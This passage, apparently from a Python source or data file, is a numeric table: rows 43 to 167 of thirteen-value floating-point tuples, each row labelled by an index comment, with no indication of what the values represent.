(14.418968111589852, 14.878636351165984, 14.376500137174213, 17.186386676954736, 15.697599533953966, 8.75, 11.181788703300251, 12.049316049382718, 16.83045475308642, 10.641590571559215, 11.637983776031925, 13.452000182898951, 14.175), # 43
(14.427344580812699, 14.83363278463649, 14.363434430727025, 17.173865174897124, 15.701766173279264, 8.75, 11.150106939401276, 11.975280246913583, 16.817606728395063, 10.609072226794698, 11.629932946751465, 13.434579240969367, 14.175), # 44
(14.435384841363105, 14.787500000000001, 14.350000000000001, 17.160937500000003, 15.705762157348616, 8.75, 11.11764705882353, 11.9, 16.804375, 10.575833333333335, 11.62159090909091, 13.416666666666666, 14.175), # 45
(14.443087779083434, 14.740330178326476, 14.336219890260631, 17.147620936213993, 15.709587229191404, 8.75, 11.084475486161544, 11.823682716049385, 16.790780308641974, 10.541949172382258, 11.612966043147525, 13.398293187014175, 14.175), # 46
(14.45045227981605, 14.692215500685872, 14.322117146776408, 17.133932767489714, 15.713241131837016, 8.75, 11.050658646009847, 11.746535802469136, 16.776843395061732, 10.507495025148607, 11.604066729018582, 13.37948952903521, 14.175), # 47
(14.457477229403315, 14.64324814814815, 14.307714814814817, 17.11989027777778, 15.716723608314837, 8.75, 11.016262962962964, 11.668766666666668, 16.762585, 10.472546172839506, 11.594901346801347, 13.360286419753088, 14.175), # 48
(14.464161513687602, 14.593520301783265, 14.29303593964335, 17.10551075102881, 15.720034401654251, 8.75, 10.981354861615428, 11.590582716049383, 16.748025864197533, 10.437177896662096, 11.585478276593093, 13.340714586191131, 14.175), # 49
(14.470504018511264, 14.543124142661183, 14.278103566529495, 17.090811471193415, 15.723173254884642, 8.75, 10.94600076656177, 11.512191358024692, 16.73318672839506, 10.401465477823503, 11.575805898491085, 13.32080475537266, 14.175), # 50
(14.476503629716676, 14.492151851851853, 14.262940740740742, 17.075809722222225, 15.726139911035398, 8.75, 10.910267102396515, 11.433800000000002, 16.718088333333338, 10.365484197530865, 11.565892592592595, 13.30058765432099, 14.175), # 51
(14.482159233146191, 14.440695610425243, 14.247570507544584, 17.060522788065846, 15.728934113135901, 8.75, 10.874220293714194, 11.355616049382716, 16.70275141975309, 10.329309336991313, 11.555746738994888, 13.280094010059445, 14.175), # 52
(14.487469714642183, 14.388847599451307, 14.232015912208508, 17.0449679526749, 15.731555604215542, 8.75, 10.837926765109337, 11.277846913580248, 16.687196728395065, 10.293016177411982, 11.545376717795238, 13.259354549611341, 14.175), # 53
(14.492433960047004, 14.336700000000002, 14.2163, 17.0291625, 15.734004127303704, 8.75, 10.801452941176471, 11.2007, 16.671445000000002, 10.256680000000001, 11.534790909090908, 13.2384, 14.175), # 54
(14.497050855203032, 14.284344993141291, 14.200445816186559, 17.01312371399177, 15.736279425429768, 8.75, 10.764865246510128, 11.124382716049384, 16.655516975308643, 10.220376085962506, 11.523997692979176, 13.217261088248744, 14.175), # 55
(14.501319285952622, 14.231874759945132, 14.184476406035667, 16.996868878600825, 15.738381241623124, 8.75, 10.728230105704835, 11.049102469135804, 16.63943339506173, 10.184179716506632, 11.513005449557303, 13.195968541380887, 14.175), # 56
(14.505238138138138, 14.179381481481483, 14.168414814814819, 16.98041527777778, 15.740309318913155, 8.75, 10.69161394335512, 10.975066666666669, 16.623215000000002, 10.148166172839508, 11.50182255892256, 13.174553086419753, 14.175), # 57
(14.508806297601952, 14.126957338820304, 14.152284087791497, 16.96378019547325, 15.742063400329245, 8.75, 10.655083184055517, 10.902482716049382, 16.606882530864198, 10.112410736168268, 11.490457401172218, 13.153045450388662, 14.175), # 58
(14.51202265018642, 14.07469451303155, 14.136107270233198, 16.946980915637862, 15.743643228900785, 8.75, 10.61870425240055, 10.83155802469136, 16.590456728395065, 10.076988687700048, 11.478918356403542, 13.131476360310929, 14.175), # 59
(14.51488608173391, 14.022685185185187, 14.119907407407407, 16.930034722222224, 15.745048547657152, 8.75, 10.582543572984749, 10.762500000000001, 16.573958333333337, 10.041975308641977, 11.467213804713806, 13.109876543209879, 14.175), # 60
(14.517395478086781, 13.971021536351168, 14.10370754458162, 16.912958899176957, 15.746279099627737, 8.75, 10.546667570402647, 10.695516049382718, 16.557408086419755, 10.00744588020119, 11.455352126200275, 13.088276726108827, 14.175), # 61
(14.519549725087407, 13.919795747599453, 14.087530727023323, 16.89577073045268, 15.74733462784193, 8.75, 10.51114266924877, 10.630813580246915, 16.540826728395064, 9.973475683584821, 11.44334170096022, 13.066707636031095, 14.175), # 62
(14.521347708578144, 13.869100000000001, 14.071400000000002, 16.878487500000002, 15.7482148753291, 8.75, 10.476035294117647, 10.568600000000002, 16.524235, 9.94014, 11.43119090909091, 13.045200000000001, 14.175), # 63
(14.522788314401359, 13.819026474622772, 14.05533840877915, 16.86112649176955, 15.74891958511865, 8.75, 10.44141186960381, 10.509082716049384, 16.50765364197531, 9.907514110653864, 11.41890813068961, 13.023784545038868, 14.175), # 64
(14.523870428399414, 13.769667352537724, 14.03936899862826, 16.843704989711934, 15.749448500239955, 8.75, 10.407338820301785, 10.45246913580247, 16.49110339506173, 9.875673296753543, 11.4065017458536, 13.00249199817101, 14.175), # 65
(14.524592936414676, 13.721114814814818, 14.023514814814817, 16.826240277777778, 15.749801363722403, 8.75, 10.373882570806101, 10.398966666666668, 16.474605000000004, 9.844692839506173, 11.393980134680135, 12.981353086419755, 14.175), # 66
(14.524954724289511, 13.673461042524005, 14.00779890260631, 16.808749639917696, 15.749977918595382, 8.75, 10.341109545711289, 10.348782716049385, 16.458179197530864, 9.814648020118886, 11.381351677266494, 12.960398536808412, 14.175), # 67
(14.524708260273156, 13.626548095048452, 13.99216832990398, 16.7910984366613, 15.749829137416285, 8.74983761621704, 10.308921272761506, 10.301681390032009, 16.44172298811157, 9.785468618306034, 11.368400383956526, 12.939542030659641, 14.174825210048013), # 68
(14.522398389694043, 13.578943727598569, 13.976183796296295, 16.772396920289854, 15.748474945533768, 8.748553909465022, 10.27637545388526, 10.25513827160494, 16.424516975308645, 9.756328946986201, 11.35380797448166, 12.918106562703056, 14.17344039351852), # 69
(14.517840102582454, 13.5304294437807, 13.95977580589849, 16.752521973966722, 15.74579903978052, 8.746025758268557, 10.243324188385918, 10.208733424782809, 16.40646404892547, 9.727087334247829, 11.337408441136512, 12.895991865809934, 14.170705268347055), # 70
(14.511097524900102, 13.481034236028144, 13.942950120027435, 16.731502905260335, 15.74183531025579, 8.742294131992075, 10.209782323354585, 10.162482213077277, 16.387591095107457, 9.697744503079695, 11.319262319097408, 12.873214112097802, 14.166655842764062), # 71
(14.502234782608697, 13.430787096774193, 13.9257125, 16.709369021739132, 15.736617647058825, 8.737400000000001, 10.175764705882354, 10.1164, 16.367925000000003, 9.668301176470589, 11.299430143540672, 12.849789473684211, 14.161328125), # 72
(14.491316001669949, 13.379717018452144, 13.90806870713306, 16.686149630971553, 15.730179940288872, 8.73138433165676, 10.141286183060329, 10.070502149062644, 16.347492649748517, 9.63875807740929, 11.277972449642624, 12.825734122686688, 14.154758123285324), # 73
(14.478405308045566, 13.32785299349529, 13.890024502743485, 16.661874040526033, 15.722556080045187, 8.72428809632678, 10.106361601979613, 10.024804023776863, 16.3263209304984, 9.609115928884586, 11.254949772579598, 12.801064231222776, 14.146981845850483), # 74
(14.463566827697262, 13.275224014336917, 13.871585648148148, 16.636571557971017, 15.713779956427018, 8.716152263374488, 10.0710058097313, 9.979320987654322, 16.30443672839506, 9.579375453885259, 11.23042264752791, 12.775795971410007, 14.138035300925928), # 75
(14.44686468658675, 13.22185907341033, 13.852757904663925, 16.610271490874936, 15.703885459533609, 8.707017802164305, 10.035233653406493, 9.934068404206677, 16.281866929583906, 9.549537375400092, 11.20445160966389, 12.749945515365916, 14.127954496742113), # 76
(14.428363010675731, 13.167787163148816, 13.833547033607681, 16.583003146806227, 15.692906479464213, 8.696925682060662, 9.999059980096293, 9.88906163694559, 16.258638420210335, 9.519602416417872, 11.177097194163862, 12.723529035208049, 14.116775441529496), # 77
(14.408125925925928, 13.113037275985667, 13.813958796296298, 16.554795833333333, 15.680876906318085, 8.685916872427983, 9.962499636891796, 9.844316049382718, 16.23477808641975, 9.489571299927379, 11.148419936204148, 12.696562703053933, 14.10453414351852), # 78
(14.386217558299041, 13.057638404354178, 13.793998954046641, 16.525678858024694, 15.667830630194468, 8.674032342630696, 9.925567470884102, 9.799847005029722, 16.210312814357568, 9.4594447489174, 11.118480370961072, 12.669062691021107, 14.091266610939643), # 79
(14.362702033756786, 13.001619540687642, 13.773673268175584, 16.495681528448742, 15.653801541192612, 8.661313062033226, 9.888278329164315, 9.755669867398264, 16.185269490169183, 9.429223486376719, 11.087339033610965, 12.64104517122711, 14.07700885202332), # 80
(14.337643478260873, 12.945009677419357, 13.752987500000001, 16.464833152173917, 15.638823529411765, 8.6478, 9.85064705882353, 9.711800000000002, 16.159675, 9.398908235294119, 11.055056459330146, 12.612526315789475, 14.061796875), # 81
(14.311106017773009, 12.887837806982612, 13.731947410836765, 16.433163036768654, 15.622930484951183, 8.633534125895444, 9.812688506952853, 9.668252766346594, 16.133556229995428, 9.368499718658382, 11.02169318329494, 12.583522296825743, 14.045666688100141), # 82
(14.283153778254908, 12.8301329218107, 13.710558762002744, 16.400700489801395, 15.606156297910111, 8.618556409083983, 9.774417520643375, 9.625043529949703, 16.10694006630087, 9.337998659458297, 10.987309740681672, 12.554049286453447, 14.028654299554185), # 83
(14.253850885668278, 12.77192401433692, 13.688827314814816, 16.36747481884058, 15.588534858387801, 8.602907818930042, 9.735848946986202, 9.582187654320988, 16.07985339506173, 9.307405780682645, 10.951966666666667, 12.524123456790125, 14.010795717592593), # 84
(14.223261465974833, 12.713240076994557, 13.666758830589849, 16.333515331454645, 15.5701000564835, 8.58662932479805, 9.696997633072435, 9.53970050297211, 16.05232310242341, 9.276721805320209, 10.915724496426252, 12.493760979953313, 13.992126950445819), # 85
(14.191449645136279, 12.654110102216913, 13.644359070644722, 16.298851335212028, 15.550885782296458, 8.569761896052432, 9.65787842599317, 9.497597439414724, 16.024376074531325, 9.245947456359774, 10.878643765136749, 12.462978028060553, 13.97268400634431), # 86
(14.15847954911433, 12.594563082437277, 13.621633796296296, 16.26351213768116, 15.53092592592593, 8.552346502057613, 9.618506172839506, 9.455893827160494, 15.996039197530868, 9.215083456790124, 10.840785007974482, 12.43179077322937, 13.95250289351852), # 87
(14.124415303870702, 12.534628010088941, 13.598588768861456, 16.22752704643049, 15.510254377471155, 8.534424112178023, 9.578895720702548, 9.414605029721079, 15.967339357567447, 9.184130529600042, 10.802208760115779, 12.400215387577312, 13.931619620198905), # 88
(14.089321035367092, 12.474333877605204, 13.575229749657066, 16.19092536902845, 15.488905027031391, 8.516035695778085, 9.539061916673392, 9.37374641060814, 15.938303440786468, 9.153089397778317, 10.762975556736963, 12.36826804322191, 13.910070194615912), # 89
(14.053260869565218, 12.413709677419357, 13.551562500000001, 16.153736413043482, 15.466911764705886, 8.497222222222224, 9.499019607843138, 9.333333333333334, 15.908958333333336, 9.121960784313726, 10.723145933014354, 12.335964912280703, 13.887890625), # 90
(14.016298932426789, 12.352784401964689, 13.527592781207133, 16.11598948604402, 15.444308480593882, 8.478024660874867, 9.458783641302887, 9.293381161408323, 15.879330921353455, 9.090745412195057, 10.682780424124285, 12.303322166871226, 13.865116919581618), # 91
(13.978499349913523, 12.2915870436745, 13.503326354595337, 16.0777138955985, 15.421129064794641, 8.458483981100443, 9.418368864143739, 9.253905258344766, 15.84944809099223, 9.059444004411093, 10.641939565243074, 12.270355979111017, 13.841785086591221), # 92
(13.939926247987117, 12.230146594982081, 13.478768981481483, 16.038938949275366, 15.397407407407409, 8.438641152263374, 9.37779012345679, 9.214920987654322, 15.819336728395063, 9.028057283950616, 10.600683891547051, 12.23708252111761, 13.81793113425926), # 93
(13.900643752609293, 12.168492048320722, 13.453926423182445, 15.999693954643051, 15.37317739853143, 8.418537143728091, 9.337062266333147, 9.176443712848654, 15.789023719707364, 8.996585973802416, 10.559073938212535, 12.203517965008546, 13.793591070816188), # 94
(13.860715989741754, 12.106652396123724, 13.42880444101509, 15.960008219269996, 15.34847292826596, 8.398212924859017, 9.296200139863902, 9.138488797439416, 15.758535951074533, 8.96503079695527, 10.517170240415854, 12.169678482901354, 13.768800904492457), # 95
(13.820207085346219, 12.044656630824377, 13.403408796296299, 15.91991105072464, 15.32332788671024, 8.377709465020576, 9.25521859114016, 9.101071604938273, 15.727900308641976, 8.933392476397968, 10.475033333333334, 12.135580246913582, 13.74359664351852), # 96
(13.779181165384388, 11.98253374485597, 13.377745250342937, 15.879431756575416, 15.297776163963531, 8.357067733577198, 9.21413246725302, 9.064207498856883, 15.6971436785551, 8.901671735119288, 10.432723752141296, 12.101239429162758, 13.718014296124831), # 97
(13.737702355817978, 11.9203127306518, 13.35181956447188, 15.83859964439077, 15.271851650125074, 8.336328699893311, 9.17295661529358, 9.027911842706905, 15.666292946959304, 8.86986929610802, 10.390302032016068, 12.066672201766417, 13.69208987054184), # 98
(13.695834782608697, 11.858022580645162, 13.325637500000003, 15.797444021739132, 15.24558823529412, 8.315533333333335, 9.131705882352943, 8.9922, 15.635375000000002, 8.83798588235294, 10.347828708133973, 12.031894736842107, 13.665859375000002), # 99
(13.653642571718258, 11.795692287269347, 13.29920481824417, 15.755994196188944, 15.21901980956992, 8.294722603261699, 9.090395115522204, 8.957087334247829, 15.60441672382259, 8.806022216842843, 10.305364315671335, 11.996923206507354, 13.639358817729768), # 100
(13.611189849108369, 11.733350842957654, 13.272527280521263, 15.714279475308645, 15.192180263051725, 8.273937479042829, 9.049039161892468, 8.922589208962048, 15.573445004572475, 8.773979022566504, 10.262969389804478, 11.961773782879694, 13.612624206961591), # 101
(13.568540740740744, 11.67102724014337, 13.245610648148148, 15.67232916666667, 15.165103485838781, 8.253218930041154, 9.00765286855483, 8.888720987654322, 15.542486728395062, 8.741857022512711, 10.22070446570973, 11.926462638076675, 13.585691550925928), # 102
(13.525759372577088, 11.60875047125979, 13.218460682441702, 15.630172577831457, 15.137823368030341, 8.232607925621096, 8.966251082600394, 8.855498033836307, 15.511568781435757, 8.709656939670245, 10.178630078563414, 11.891005944215824, 13.558596857853223), # 103
(13.482909870579116, 11.546549528740211, 13.191083144718794, 15.587839016371445, 15.110373799725652, 8.212145435147082, 8.924848651120257, 8.822935711019662, 15.480718049839965, 8.677379497027893, 10.13680676354185, 11.855419873414677, 13.53137613597394), # 104
(13.440056360708535, 11.484453405017922, 13.163483796296298, 15.545357789855073, 15.082788671023966, 8.19187242798354, 8.883460421205521, 8.79104938271605, 15.449961419753087, 8.64502541757444, 10.095295055821373, 11.819720597790775, 13.50406539351852), # 105
(13.39726296892706, 11.42249109252622, 13.135668398491084, 15.50275820585078, 15.055101872024531, 8.171829873494895, 8.842101239947283, 8.759854412437129, 15.41932577732053, 8.612595424298663, 10.054155490578298, 11.783924289461654, 13.476700638717421), # 106
(13.3545938211964, 11.360691583698395, 13.10764271262003, 15.460069571927, 15.027347292826596, 8.152058741045574, 8.800785954436646, 8.72936616369456, 15.388838008687703, 8.580090240189355, 10.013448602988953, 11.748047120544847, 13.449317879801098), # 107
(13.312113043478263, 11.299083870967744, 13.079412500000002, 15.417321195652177, 14.999558823529412, 8.132600000000002, 8.759529411764706, 8.699600000000002, 15.358525000000002, 8.547510588235296, 9.973234928229665, 11.712105263157897, 13.421953125000002), # 108
(13.26988476173436, 11.237696946767558, 13.050983521947876, 15.374542384594738, 14.97177035423223, 8.113494619722603, 8.718346459022568, 8.670571284865114, 15.328413637402836, 8.514857191425268, 9.933575001476758, 11.676114889418335, 13.394642382544584), # 109
(13.227973101926404, 11.176559803531132, 13.022361539780524, 15.331762446323136, 14.944015775034297, 8.094783569577809, 8.677251943301325, 8.642295381801555, 15.29853080704161, 8.482130772748057, 9.894529357906551, 11.640092171443701, 13.367421660665297), # 110
(13.186442190016104, 11.11570143369176, 12.993552314814819, 15.2890106884058, 14.91632897603486, 8.076507818930043, 8.636260711692085, 8.614787654320988, 15.26890339506173, 8.449332055192448, 9.856158532695375, 11.60405328135153, 13.340326967592594), # 111
(13.14535615196517, 11.055150829682729, 12.96456160836763, 15.246316418411165, 14.888743847333174, 8.05870833714373, 8.595387611285942, 8.588063465935072, 15.239558287608595, 8.416461761747223, 9.818523061019553, 11.568014391259355, 13.313394311556928), # 112
(13.104705913184263, 10.995038066300333, 12.935464959552897, 15.203767435488858, 14.861245952243188, 8.04141767690032, 8.554736349119478, 8.562193596292849, 15.21059793576207, 8.383626631257822, 9.781693468614014, 11.5320701111062, 13.286621461180511), # 113
(13.064073257060091, 10.935956056935751, 12.906663945030267, 15.161705189788272, 14.833550696392859, 8.024596451941862, 8.514825491774811, 8.537495763307168, 15.182466649998286, 8.351441235077896, 9.745742071958476, 11.496677040958165, 13.25978557982405), # 114
(13.023338864205595, 10.877926078156266, 12.878175705790246, 15.120118307254492, 14.805570749044042, 8.008200917498272, 8.475683510268187, 8.513963715990194, 15.155174970136306, 8.319955459183308, 9.710616315997932, 11.461852615582393, 13.232809284324528), # 115
(12.982451822532688, 10.820863593808383, 12.849945065977423, 15.078932610372966, 14.777263936937292, 7.992192428201937, 8.43724674453905, 8.491532438058591, 15.128653874918964, 8.289110701829367, 9.676248303780074, 11.427532476482286, 13.205650163658248), # 116
(12.941361219953283, 10.76468406773861, 12.82191684973638, 15.038073921629142, 14.748588086813156, 7.976532338685248, 8.399451534526854, 8.47013691322902, 15.102834343089086, 8.258848361271381, 9.642570138352598, 11.39365226516125, 13.178265806801516), # 117
(12.900016144379297, 10.709302963793455, 12.794035881211714, 14.997468063508467, 14.71950102541218, 7.9611820035805945, 8.362234220171041, 8.449712125218136, 15.07764735338951, 8.229109835764664, 9.609513922763194, 11.36014762312269, 13.150613802730636), # 118
(12.858365683722639, 10.654635745819421, 12.766246984548014, 14.95704085849639, 14.689960579474912, 7.946102777520366, 8.325531141411059, 8.430193057742605, 15.053023884563062, 8.199836523564521, 9.577011760059559, 11.326954191870009, 13.122651740421906), # 119
(12.816358925895228, 10.600597877663022, 12.738494983889867, 14.916718129078353, 14.659924575741897, 7.931256015136952, 8.289278638186355, 8.41151469451908, 15.028894915352582, 8.170969822926269, 9.544995753289383, 11.294007612906617, 13.094337208851638), # 120
(12.773944958808976, 10.547104823170763, 12.710724703381864, 14.876425697739808, 14.629350840953688, 7.9166030710627435, 8.253413050436373, 8.39361201926423, 15.0051914245009, 8.142451132105215, 9.513398005500363, 11.261243527735912, 13.065627796996127), # 121
(12.731072870375797, 10.494072046189146, 12.682880967168597, 14.836089386966199, 14.598197201850828, 7.902105299930128, 8.217870718100565, 8.376420015694709, 14.981844390750846, 8.11422184935667, 9.482150619740192, 11.228597577861303, 13.036481093831679), # 122
(12.687691748507607, 10.441415010564684, 12.65490859939465, 14.795635019242972, 14.56642148517387, 7.887724056371495, 8.182587981118376, 8.359873667527177, 14.958784792845258, 8.086223372935942, 9.451185699056563, 11.19600540478619, 13.0068546883346), # 123
(12.643750681116316, 10.389049180143882, 12.62675242420462, 14.754988417055582, 14.533981517663353, 7.873420695019235, 8.147501179429248, 8.343907958478297, 14.935943609526962, 8.058397101098347, 9.420435346497168, 11.163402650013985, 12.976706169481197), # 124
(12.599198756113843, 10.33689001877325, 12.598357265743093, 14.714075402889465, 14.500835126059833, 7.859156570505739, 8.112546652972636, 8.328457872264728, 14.913251819538791, 8.030684432099187, 9.389831665109703, 11.130724955048088, 12.94599312624776), # 125
(12.553985061412101, 10.284852990299292, 12.56966794815466, 14.672821799230077, 14.466940137103851, 7.844893037463395, 8.077660741687978, 8.31345839260313, 14.890640401623585, 8.00302676419378, 9.359306757941859, 11.097907961391908, 12.91467314761061), # 126
(12.508058684923006, 10.232853558568515, 12.540629295583907, 14.63115342856286, 14.432254377535958, 7.830591450524592, 8.042779785514732, 8.298844503210164, 14.86804033452417, 7.975365495637434, 9.32879272804133, 11.064887310548842, 12.88270382254604), # 127
(12.461368714558466, 10.18080718742743, 12.51118613217543, 14.588996113373266, 14.396735674096707, 7.816213164321722, 8.007840124392336, 8.284551187802489, 14.845382596983379, 7.947642024685458, 9.298221678455814, 11.031598644022305, 12.850042740030352), # 128
(12.413864238230394, 10.128629340722538, 12.481283282073816, 14.546275676146736, 14.360341853526638, 7.801719533487173, 7.972778098260239, 8.270513430096765, 14.822598167744045, 7.919797749593164, 9.267525712233, 10.997977603315691, 12.816647489039854), # 129
(12.365494343850713, 10.076235482300353, 12.450865569423652, 14.502917939368722, 14.3230307425663, 7.7870719126533325, 7.937530047057888, 8.256666213809652, 14.799618025549002, 7.89177406861586, 9.236636932420582, 10.963959829932413, 12.78247565855085), # 130
(12.316208119331334, 10.023541076007378, 12.419877818369534, 14.458848725524668, 14.284760167956243, 7.772231656452593, 7.902032310724733, 8.24294452265781, 14.776373149141081, 7.86351238000886, 9.205487442066255, 10.929480965375875, 12.747484837539638), # 131
(12.265954652584163, 9.970461585690122, 12.388264853056045, 14.413993857100023, 14.245487956437017, 7.757160119517344, 7.8662212292002165, 8.229283340357902, 14.752794517263117, 7.834954082027471, 9.17400934421771, 10.894476651149478, 12.711632614982527), # 132
(12.21468303152113, 9.91691247519509, 12.355971497627777, 14.368279156580234, 14.205171934749162, 7.741818656479974, 7.830033142423786, 8.215617650626585, 14.728813108657938, 7.806040572927006, 9.142134741922645, 10.85888252875663, 12.674876579855821), # 133
(12.162342344054133, 9.862809208368793, 12.322942576229327, 14.321630446450746, 14.163769929633231, 7.726168621972872, 7.79340439033489, 8.201882437180522, 14.704359902068381, 7.776713250962773, 9.109795738228751, 10.822634239700733, 12.637174321135817), # 134
(12.108881678095097, 9.808067249057736, 12.289122913005274, 14.273973549197011, 14.12123976782977, 7.710171370628429, 7.756271312872975, 8.18801268373637, 14.679365876237274, 7.746913514390087, 9.07692443618372, 10.785667425485194, 12.59848342779883), # 135
(12.05425012155593, 9.752602061108423, 12.254457332100213, 14.225234287304469, 14.077539276079325, 7.693788257079036, 7.718570249977489, 8.173943374010788, 14.65376200990745, 7.716582761464252, 9.043452938835248, 10.747917727613418, 12.558761488821151), # 136
(11.998396762348548, 9.696329108367367, 12.218890657658735, 14.175338483258576, 14.032626281122448, 7.6769806359570785, 7.6802375415878785, 8.159609491720442, 14.627479281821747, 7.685662390440583, 9.009313349231029, 10.709320787588808, 12.517966093179089), # 137
(11.941270688384867, 9.639163854681073, 12.182367713825425, 14.12421195954477, 13.986458609699687, 7.6597098618949495, 7.6412095276435865, 8.144946020581987, 14.600448670722995, 7.654093799574386, 8.974437770418753, 10.66981224691477, 12.476054829848946), # 138
(11.882820987576796, 9.581021763896047, 12.144833324744877, 14.071780538648504, 13.938994088551583, 7.641937289525037, 7.601422548084064, 8.129887944312085, 14.572601155354022, 7.621818387120976, 8.938758305446116, 10.62932774709471, 12.432985287807028), # 139
(11.822996747836257, 9.521818299858795, 12.106232314561684, 14.017970043055223, 13.890190544418692, 7.623624273479732, 7.560812942848756, 8.114370246627395, 14.543867714457667, 7.588777551335661, 8.902207057360812, 10.58780292963203, 12.38871505602964), # 140
(11.761747057075162, 9.46146892641583, 12.066509507420426, 13.962706295250376, 13.840005804041555, 7.604732168391422, 7.519317051877113, 8.09832791124458, 14.514179326776754, 7.554912690473753, 8.864716129210535, 10.545173436030137, 12.34320172349308), # 141
(11.69902100320542, 9.399889107413653, 12.0256097274657, 13.90591511771941, 13.788397694160723, 7.585222328892499, 7.476871215108577, 8.081695921880296, 14.48346697105412, 7.52016520279056, 8.826217624042977, 10.501374907792433, 12.296402879173653), # 142
(11.634767674138946, 9.336994306698774, 11.983477798842097, 13.847522332947767, 13.735324041516742, 7.56505610961535, 7.4334117724825965, 8.064409262251205, 14.451661626032607, 7.484476486541395, 8.786643644905832, 10.456342986422326, 12.248276112047666), # 143
(11.56893615778766, 9.2726999881177, 11.9400585456942, 13.787453763420901, 13.680742672850162, 7.544194865192366, 7.3888750639386185, 8.04640291607397, 14.418694270455035, 7.4477879399815645, 8.745926294846791, 10.41001331342322, 12.198779011091421), # 144
(11.501475542063469, 9.20692161551694, 11.895296792166606, 13.725635231624254, 13.624611414901528, 7.5225999502559375, 7.343197429416091, 8.027611867065247, 14.384495883064238, 7.410040961366383, 8.703997676913554, 10.36232153029852, 12.14786916528122), # 145
(11.432334914878291, 9.139574652742999, 11.849137362403903, 13.661992560043277, 13.566888094411391, 7.500232719438453, 7.2963152088544625, 8.007971098941699, 14.34899744260305, 7.37117694895116, 8.660789894153808, 10.313203278551628, 12.095504163593366), # 146
(11.361463364144042, 9.070574563642383, 11.801525080550675, 13.596451571163414, 13.507530538120294, 7.477054527372301, 7.2481647421931745, 7.987415595419982, 14.312129927814308, 7.331137300991204, 8.616235049615252, 10.262594199685955, 12.041641595004167), # 147
(11.288809977772631, 8.999836812061604, 11.752404770751518, 13.528938087470117, 13.446496572768787, 7.453026728689875, 7.198682369371678, 7.965880340216761, 14.273824317440841, 7.289863415741826, 8.570265246345576, 10.210429935204898, 11.986239048489919), # 148
(11.214323843675977, 8.927276861847163, 11.701721257151021, 13.459377931448826, 13.38374402509742, 7.42811067802356, 7.147804430329418, 7.943300317048694, 14.234011590225474, 7.247296691458339, 8.522812587392474, 10.156646126611868, 11.929254113026934), # 149
(11.137954049765991, 8.852810176845571, 11.649419363893772, 13.387696925584994, 13.319230721846738, 7.402267730005749, 7.0954672650058415, 7.91961050963244, 14.192622724911054, 7.2033785263960475, 8.473809175803641, 10.101178415410269, 11.870644377591507), # 150
(11.059649683954586, 8.776352220903336, 11.59544391512436, 13.313820892364063, 13.252914489757288, 7.375459239268828, 7.041607213340397, 7.8947459016846615, 14.149588700240406, 7.15805031881027, 8.423187114626767, 10.043962443103501, 11.810367431159946), # 151
(10.979359834153682, 8.697818457866962, 11.539739734987382, 13.237675654271488, 13.184753155569618, 7.34764656044519, 6.986160615272531, 7.8686414769220185, 14.10484049495636, 7.11125346695631, 8.37087850690955, 9.984933851194974, 11.748380862708558), # 152
(10.897033588275185, 8.61712435158296, 11.482251647627416, 13.159187033792707, 13.11470454602428, 7.318791048167222, 6.929063810741687, 7.841232219061167, 14.058309087801755, 7.062929369089481, 8.316815455699683, 9.92402828118809, 11.68464226121364), # 153
(10.81262003423102, 8.534185365897834, 11.422924477189063, 13.078280853413174, 13.042726487861813, 7.288854057067317, 6.87025313968732, 7.8124531118187726, 14.009925457519413, 7.013019423465095, 8.260930064044857, 9.861181374586256, 11.6191092156515), # 154
(10.72606825993309, 8.448916964658093, 11.361703047816906, 12.99488293561833, 12.968776807822776, 7.257796941777861, 6.809664942048866, 7.782239138911491, 13.95962058285218, 6.9614650283384565, 8.203154434992767, 9.796328772892876, 11.551739314998438), # 155
(10.637327353293314, 8.361234611710243, 11.298532183655539, 12.908919102893627, 12.892813332647707, 7.225581056931246, 6.74723555776578, 7.750525284055986, 13.907325442542877, 6.9082075819648825, 8.143420671591107, 9.729406117611353, 11.48249014823076), # 156
(10.546346402223609, 8.271053770900794, 11.233356708849547, 12.820315177724513, 12.81479388907716, 7.19216775715986, 6.6829013267775075, 7.717246530968915, 13.852971015334345, 6.853188482599679, 8.08166087688757, 9.660349050245092, 11.411319304324769), # 157
(10.450553324967336, 8.176634369081162, 11.163028735463298, 12.725677414311741, 12.731153548219398, 7.155434266843955, 6.615149409299001, 7.680115733289122, 13.792326928238738, 6.794712282807602, 8.01583405355452, 9.586639389872076, 11.335080203181485), # 158
(10.335201473769764, 8.06829144743927, 11.069432945764184, 12.605568022303835, 12.62126783369428, 7.103165507209945, 6.535497868740003, 7.626098945870136, 13.700998165711002, 6.723193391738244, 7.934383709866593, 9.493907533156353, 11.235598705688274), # 159
(10.198820932866035, 7.945135419957, 10.950689341138245, 12.458008514572404, 12.482988183885514, 7.034077814466758, 6.443141247737298, 7.553838865338286, 13.576395318120113, 6.637687912608051, 7.8361633120533565, 9.380702728442985, 11.110988852451014), # 160
(10.042510876420344, 7.8079692153126565, 10.808065760674433, 12.28440150525942, 12.317750373994958, 6.94900813819844, 6.338754024409627, 7.464240746353693, 13.420161673798626, 6.5389214704393135, 7.7220383164395905, 9.248074456470599, 10.962523662746737), # 161
(9.8673704785969, 7.657595762184535, 10.642830043461695, 12.086149608506858, 12.126990179224487, 6.848793427989039, 6.223010676875733, 7.358209843576484, 13.233940521079093, 6.427619690254325, 7.592874179350069, 9.09707219797781, 10.791476155852466), # 162
(9.674498913559898, 7.494817989250934, 10.456250028588983, 11.864655438456708, 11.912143374775964, 6.734270633422602, 6.096585683254362, 7.2366514116667755, 13.019375148294069, 6.304508197075376, 7.449536357109572, 8.928745433703247, 10.599119351045232), # 163
(9.464995355473539, 7.320438825190149, 10.249593555145248, 11.621321609250947, 11.674645735851264, 6.606276704083181, 5.960153521664253, 7.100470705284697, 12.778108843776113, 6.170312615924756, 7.292890306042875, 8.744143644385526, 10.386726267602059), # 164
(9.239958978502024, 7.135261198680485, 10.024128462219437, 11.357550735031554, 11.415933037652254, 6.465648589554821, 5.814388670224151, 6.950572979090365, 12.511784895857772, 6.02575857182476, 7.123801482474756, 8.544316310763268, 10.155569924799979), # 165
(9.000488956809557, 6.940088038400237, 9.7811225889005, 11.074745429940503, 11.137441055380801, 6.313223239421572, 5.659965607052801, 6.787863487743908, 12.222046592871603, 5.871571689797677, 6.943135342729992, 8.330312913575103, 9.906923341916015), # 166
(8.747684464560333, 6.735722273027703, 9.521843774277388, 10.774308308119782, 10.840605564238773, 6.149837603267482, 5.497558810268945, 6.613247485905448, 11.91053722315016, 5.7084775948658, 6.751757343133359, 8.103182933559642, 9.642059538227196), # 167
